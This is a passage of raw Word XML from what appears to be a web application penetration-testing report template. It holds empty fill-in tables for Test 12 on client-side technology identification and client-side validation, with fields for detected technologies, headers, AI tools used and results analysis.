                <w:numId w:val="20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A678166" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF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218B4" w:rsidRPr="00FA1AAF" w14:paraId="270805C0" w14:textId="77777777" w:rsidTr="002464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4D272EE" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="002464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Other </w:t>
            </w:r>
            <w:r w:rsidRPr="003546FC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88FC1B7" w14:textId="77777777" w:rsidR="009218B4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E077E97" w14:textId="77777777" w:rsidR="009218B4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0906363" w14:textId="77777777" w:rsidR="009218B4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0A11656" w14:textId="77777777" w:rsidR="00A63604" w:rsidRDefault="00A63604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9FC5423" w14:textId="77777777" w:rsidR="00A63604" w:rsidRDefault="00A63604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E41A29C" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF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9218B4" w:rsidRPr="00FA1AAF" w14:paraId="146F43F4" w14:textId="77777777" w:rsidTr="002464D6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9D170BC" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="002464D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A1AAF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2DEE244" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="207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B9B4236" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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E480708" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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C4289A8" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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FA7E45F" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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6F0F18A" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4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170596B6" w14:textId="77777777" w:rsidR="00631E93" w:rsidRDefault="00631E93" w:rsidP="00631E93">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C738AB3" w14:textId="77777777" w:rsidR="00631E93" w:rsidRPr="00B07F1E" w:rsidRDefault="00631E93" w:rsidP="00631E93">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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31E93" w:rsidRPr="005D2C80" w14:paraId="4FE89D7A" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079CD2EB" w14:textId="77777777" w:rsidR="00631E93" w:rsidRPr="005D2C80" w:rsidRDefault="00631E93" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26542557" w14:textId="77777777" w:rsidR="00631E93" w:rsidRPr="005D2C80" w:rsidRDefault="00631E93" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05293547" w14:textId="77777777" w:rsidR="00631E93" w:rsidRDefault="00631E93" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18EDA0E3" w14:textId="77777777" w:rsidR="00631E93" w:rsidRDefault="00631E93" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="302CC551" w14:textId="77777777" w:rsidR="00A63604" w:rsidRDefault="00A63604" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01317C55" w14:textId="77777777" w:rsidR="00A63604" w:rsidRDefault="00A63604" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F41F1DD" w14:textId="77777777" w:rsidR="00631E93" w:rsidRPr="005D2C80" w:rsidRDefault="00631E93" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28E30BFE" w14:textId="77777777" w:rsidR="00802F83" w:rsidRDefault="00802F83" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7194BE3E" w14:textId="23B40907" w:rsidR="00540212" w:rsidRDefault="00540212" w:rsidP="00540212">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00540212">
        <w:lastRenderedPageBreak/>
        <w:t>Test 12: Evaluate Applications for Client-Side Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9DA8A" w14:textId="5840ECAD" w:rsidR="00631E93" w:rsidRPr="005367E3" w:rsidRDefault="00AD06AE" w:rsidP="00AD06AE">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005367E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="005367E3" w:rsidRPr="005367E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">This section </w:t>
      </w:r>
      <w:r w:rsidR="007B054B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>includes various techniques for</w:t>
      </w:r>
      <w:r w:rsidR="005367E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005367E3" w:rsidRPr="005367E3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>testing client-side vulnerabilities that could significantly impact the security of the web application.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E664D" w14:textId="77777777" w:rsidR="005367E3" w:rsidRDefault="005367E3" w:rsidP="00AD06AE">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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6637A6" w:rsidRPr="00A51A96" w14:paraId="418C8438" w14:textId="77777777" w:rsidTr="007B054B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B8BE992" w14:textId="5B6362EF" w:rsidR="006637A6" w:rsidRPr="003C713F" w:rsidRDefault="006637A6" w:rsidP="005232C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462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Test 12.1: </w:t>
            </w:r>
            <w:r w:rsidR="00A700C5" w:rsidRPr="00462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Identify Client-side Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58D8FA42" w14:textId="77777777" w:rsidR="00631E93" w:rsidRPr="007B054B" w:rsidRDefault="00631E93" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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A621A8" w:rsidRPr="00FA1AAF" w14:paraId="1C52AE7A" w14:textId="77777777" w:rsidTr="007B054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974DA3D" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="007B054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A1AAF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32E52895" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8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621A8" w:rsidRPr="00FA1AAF" w14:paraId="538D352B" w14:textId="77777777" w:rsidTr="007B054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AFC49B3" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="007B054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A1AAF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2BA42787" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8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621A8" w:rsidRPr="00FA1AAF" w14:paraId="397D3E2B" w14:textId="77777777" w:rsidTr="007B054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B3D8544" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="007B054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A1AAF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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="322E68F5" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8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621A8" w:rsidRPr="00FA1AAF" w14:paraId="3040CA48" w14:textId="77777777" w:rsidTr="007B054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4C6D62F" w14:textId="4E111FAE" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="004C37EE" w:rsidP="007B054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C37EE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Detected Client-Side Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B138565" w14:textId="3B053E02" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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6E451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A87EED" w:rsidRPr="00A87EE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HTML5, JavaScript, AJAX, JSON, Cookies, LocalStorage, SessionStorage, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="006E451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6F12FA3" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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C42FCCD" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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DBD3FAF" w14:textId="77777777" w:rsidR="007B054B" w:rsidRPr="006E451C" w:rsidRDefault="007B054B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B2966" w:rsidRPr="00FA1AAF" w14:paraId="5AB29CE6" w14:textId="77777777" w:rsidTr="007B054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09CFE5A" w14:textId="129F7A4D" w:rsidR="00BB2966" w:rsidRPr="00FA1AAF" w:rsidRDefault="00BB2966" w:rsidP="007B054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B2966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Identified Frameworks &amp; Libraries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23FB8D2E" w14:textId="77777777" w:rsidR="00BB2966" w:rsidRPr="00E270A6" w:rsidRDefault="00676EE0" w:rsidP="00BB296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E270A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E270A6" w:rsidRPr="00E270A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React, Angular, jQuery, Bootstrap, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060C1CB7" w14:textId="77777777" w:rsidR="00E270A6" w:rsidRDefault="00E270A6" w:rsidP="00BB296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5600CBC" w14:textId="77777777" w:rsidR="00E270A6" w:rsidRDefault="00E270A6" w:rsidP="00BB296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2BE543F" w14:textId="5623AA43" w:rsidR="007B054B" w:rsidRPr="00FA1AAF" w:rsidRDefault="007B054B" w:rsidP="00BB296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621A8" w:rsidRPr="00FA1AAF" w14:paraId="44081068" w14:textId="77777777" w:rsidTr="007B054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139FD40" w14:textId="59C65324" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00EF3FA1" w:rsidP="007B054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EF3FA1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Script &amp; Meta Tag Analysis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78B5349F" w14:textId="7B2C1EA6" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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26606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EF3FA1" w:rsidRPr="00EF3FA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Detected &lt;script&gt;, &lt;link&gt;, and &lt;meta&gt; references</w:t>
            </w:r>
            <w:r w:rsidRPr="0026606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AB0B6B0" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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245AB5E" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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85D72C0" w14:textId="77777777" w:rsidR="007B054B" w:rsidRPr="0026606A" w:rsidRDefault="007B054B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A621A8" w:rsidRPr="00FA1AAF" w14:paraId="57D66227" w14:textId="77777777" w:rsidTr="007B054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46A4BC3" w14:textId="313DC681" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00121498" w:rsidP="007B054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121498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HTTP Headers Analyzed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE9337B" w14:textId="3D868DFB" w:rsidR="00A621A8" w:rsidRPr="004723E7" w:rsidRDefault="00A621A8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4723E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121498" w:rsidRPr="0012149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X-Powered-By, Server, Technology Disclosure</w:t>
            </w:r>
            <w:r w:rsidRPr="004723E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968E601" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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CD89A93" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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84C72A0" w14:textId="77777777" w:rsidR="007B054B" w:rsidRPr="00FA1AAF" w:rsidRDefault="007B054B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621A8" w:rsidRPr="00FA1AAF" w14:paraId="7206F27B" w14:textId="77777777" w:rsidTr="007B054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6805FF0" w14:textId="668C9779" w:rsidR="00A621A8" w:rsidRPr="004723E7" w:rsidRDefault="00210F78" w:rsidP="007B054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210F78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Cookies &amp; Storage APIs Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15ED5800" w14:textId="713024FF" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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210F78" w:rsidRPr="00210F7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SessionStorage, LocalStorage, IndexedDB,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D55BB5C" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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FE6DE43" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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D019D93" w14:textId="77777777" w:rsidR="007B054B" w:rsidRPr="004723E7" w:rsidRDefault="007B054B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A621A8" w:rsidRPr="00FA1AAF" w14:paraId="768493C5" w14:textId="77777777" w:rsidTr="007B054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A16A1F8" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="007B054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 xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidRPr="003546FC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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="615096A9" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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BB0BCFD" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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64F2FD1" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRDefault="00A621A8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6EA5325" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="005232C4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621A8" w:rsidRPr="00FA1AAF" w14:paraId="488B5200" w14:textId="77777777" w:rsidTr="007B054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725EAE5" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="007B054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A1AAF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64B1369F" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="208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D894D05" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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75CC22A" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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C9176C9" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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386D955" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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74C6353" w14:textId="77777777" w:rsidR="00A621A8" w:rsidRPr="00FA1AAF" w:rsidRDefault="00A621A8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73F22" w:rsidRPr="00FA1AAF" w14:paraId="3CEFEB51" w14:textId="77777777" w:rsidTr="007B054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7A3AA7F" w14:textId="68DC9B46" w:rsidR="00173F22" w:rsidRPr="00FA1AAF" w:rsidRDefault="00173F22" w:rsidP="007B054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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used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(If any)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="723DBDDE" w14:textId="77777777" w:rsidR="00173F22" w:rsidRPr="0004313F" w:rsidRDefault="00173F22" w:rsidP="00173F2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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">ShellGPT, </w:t>
            </w:r>
            <w:r w:rsidRPr="0004313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Gemini, Copilot, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45A9EE00" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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495F6D7" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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192B535" w14:textId="77777777" w:rsidR="00AA214D" w:rsidRDefault="00AA214D" w:rsidP="00173F2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9196560" w14:textId="77777777" w:rsidR="00AA214D" w:rsidRDefault="00AA214D" w:rsidP="00173F2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CD0AFAB" w14:textId="77777777" w:rsidR="00AA214D" w:rsidRPr="00FA1AAF" w:rsidRDefault="00AA214D" w:rsidP="00173F2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173F22" w:rsidRPr="00FA1AAF" w14:paraId="41F29D02" w14:textId="77777777" w:rsidTr="007B054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BDE3B28" w14:textId="137E25C1" w:rsidR="00173F22" w:rsidRPr="00357473" w:rsidRDefault="00173F22" w:rsidP="007B054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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="697B1049" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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12CC30C" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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D4366DF" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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A742552" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0790329E" w14:textId="77777777" w:rsidR="00AA214D" w:rsidRPr="0004313F" w:rsidRDefault="00AA214D" w:rsidP="00173F2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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00173F22" w:rsidRPr="00FA1AAF" w14:paraId="49686F1A" w14:textId="77777777" w:rsidTr="007B054B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082292C" w14:textId="467B0433" w:rsidR="00173F22" w:rsidRPr="00357473" w:rsidRDefault="00173F22" w:rsidP="007B054B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54B18">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Additional Observations &amp; Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785CE480" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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EB709BF" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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EFDB8FA" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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C72565F" w14:textId="77777777" w:rsidR="00173F22" w:rsidRDefault="00173F22" w:rsidP="00173F2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51AD1197" w14:textId="77777777" w:rsidR="007073F6" w:rsidRDefault="007073F6" w:rsidP="007073F6">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788B421" w14:textId="77777777" w:rsidR="007073F6" w:rsidRPr="00B07F1E" w:rsidRDefault="007073F6" w:rsidP="007073F6">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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73F6" w:rsidRPr="005D2C80" w14:paraId="275AA245" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="527353DE" w14:textId="77777777" w:rsidR="007073F6" w:rsidRPr="005D2C80" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D654B7C" w14:textId="77777777" w:rsidR="007073F6" w:rsidRPr="005D2C80" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="220D93BD" w14:textId="77777777" w:rsidR="007073F6" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DE97C45" w14:textId="77777777" w:rsidR="007073F6" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21929F78" w14:textId="77777777" w:rsidR="007073F6" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41C4B649" w14:textId="77777777" w:rsidR="007073F6" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F58FCAA" w14:textId="77777777" w:rsidR="002C0E71" w:rsidRDefault="002C0E71" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23357B77" w14:textId="77777777" w:rsidR="007073F6" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F86E63F" w14:textId="77777777" w:rsidR="002C0E71" w:rsidRDefault="002C0E71" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01514F44" w14:textId="77777777" w:rsidR="007073F6" w:rsidRPr="005D2C80" w:rsidRDefault="007073F6" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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AB3CFF" w:rsidRPr="00A51A96" w14:paraId="4643F89C" w14:textId="77777777" w:rsidTr="00566758">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="654FED00" w14:textId="7BC97BF5" w:rsidR="00AB3CFF" w:rsidRPr="003C713F" w:rsidRDefault="00AB3CFF" w:rsidP="005232C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462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Test 12.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="0046204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B3654E" w:rsidRPr="00B3654E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test the Application’s Reliance on Client-Side Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FF1CCCA" w14:textId="77777777" w:rsidR="002C0E71" w:rsidRPr="00FC7DCD" w:rsidRDefault="002C0E71" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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3022"/>
        <w:gridCol w:w="3503"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w14:paraId="4CA6A8F1" w14:textId="77777777" w:rsidTr="00A83C8E">
        <w:trPr>
          <w:trHeight w:val="422"/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5C12AFBF" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00A83C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10FAB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53ED2B65" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00E10FA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10FAB" w:rsidRPr="00E10FAB" w14:paraId="5E64998D" w14:textId="77777777" w:rsidTr="00A83C8E">
        <w:trPr>
          <w:trHeight w:val="422"/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30AC0AEE" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00A83C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10FAB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532C1D15" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00E10FA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10FAB" w:rsidRPr="00E10FAB" w14:paraId="43A1142D" w14:textId="77777777" w:rsidTr="00A83C8E">
        <w:trPr>
          <w:trHeight w:val="422"/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546397C7" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00A83C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10FAB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0BC29A2B" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00E10FA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E10FAB" w:rsidRPr="00E10FAB" w14:paraId="4ADE81CC" w14:textId="77777777" w:rsidTr="00A83C8E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494A02C4" w14:textId="6DBB6F23" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="006A5BC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10FAB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Does the Application Relies Solely on Client-Side Validation for Securing the web</w:t>
            </w:r>
            <w:r w:rsidR="006A5BC9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Appl</w:t>
            </w:r>
            <w:r w:rsidRPr="00E10FAB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
